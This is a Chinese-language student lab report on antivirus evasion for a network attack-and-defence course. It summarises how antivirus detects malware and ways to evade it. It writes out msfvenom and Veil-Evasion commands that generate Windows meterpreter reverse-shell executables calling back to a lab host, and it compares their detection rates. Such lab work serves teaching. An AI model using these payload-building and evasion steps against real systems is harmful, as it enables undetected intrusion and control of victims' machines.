20145303 刘俊谦 《网络攻防》 免杀原理与实践

20145303 刘俊谦 《网络攻防》 免杀原理与实践

基础问题回答

1.杀软是如何检测出恶意代码的？
（1）基于特征码的检测
（2）启发式恶意软件检测
（3）基于行为的恶意软件检测
2.免杀是做什么？
免杀，也就是反病毒（AntiVirus）与反间谍（AntiSpyware）的对立面，英文为Anti-AntiVirus（简写Virus AV），翻译为“反杀毒技术”。使恶意代码不被系统发现而被发现的一种技术。
3.免杀的基本方法有哪些？
（1）加冷门壳
（2）加壳改壳
（3）加花指令
（4）改程序入口点
（5）修改内存特征码

实践总结与体会

有了杀毒软件才有的免杀，而且两者一直在互相处于对方的对立面。对于加壳和修改特征码等免杀手段来说来说，如果出现新的一种，杀毒软件是无效的，但之后如果杀毒软件反应快的话，很快这种免杀手段就会无效。所以我们还是不能完全信赖于杀毒软件，一方面加强自己的反病毒意识，一方面也不要把重要信息暴露于电脑上。

实践过程记录

msfvenom直接生成meterpreter可执行文件

Windows与Kali的IP地址如下图：

使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.106 PORT=5333 -f exe > test.exe生成meterpreter可执行文件

用ncat将文件传输到windows，检测：

Msfvenom使用编码器生成meterpreter可执行文件

编码一次，生成可执行文件

用ncat将文件传输到windows，并检测：

没什么效果

编码十次，生成可执行文件

用ncat将文件传输到windows，再检测：

我们可以看到，查杀出的概率反而更高了，所以编码这种方法大多数情况下并没有什么效果

Veil-Evasion生成可执行文件

直接输入veil-evasion打开软件

在menu里面输入以下命令来生成可执行文件：

use python/meterpreter/rev_tcp set LHOST 192.168.1.111 generate 5303test 1

成功后如下：

检测：

可以看到，效果还是不错的

C语言调用Shellcode

生成一个c语言格式的Shellcode数组：

然后用这个数组来编写程序，由于自己电脑上没相应程序，所以用其他同学电脑上编写再拷回来

监听后才打开的程序，在检测的时候弹出来360的警告

下图是检测结果

可以看到，15%的概率比最初少很多，效果很好！

电脑实测

kail开启监听，及结果：

成功获得对方屏幕截图：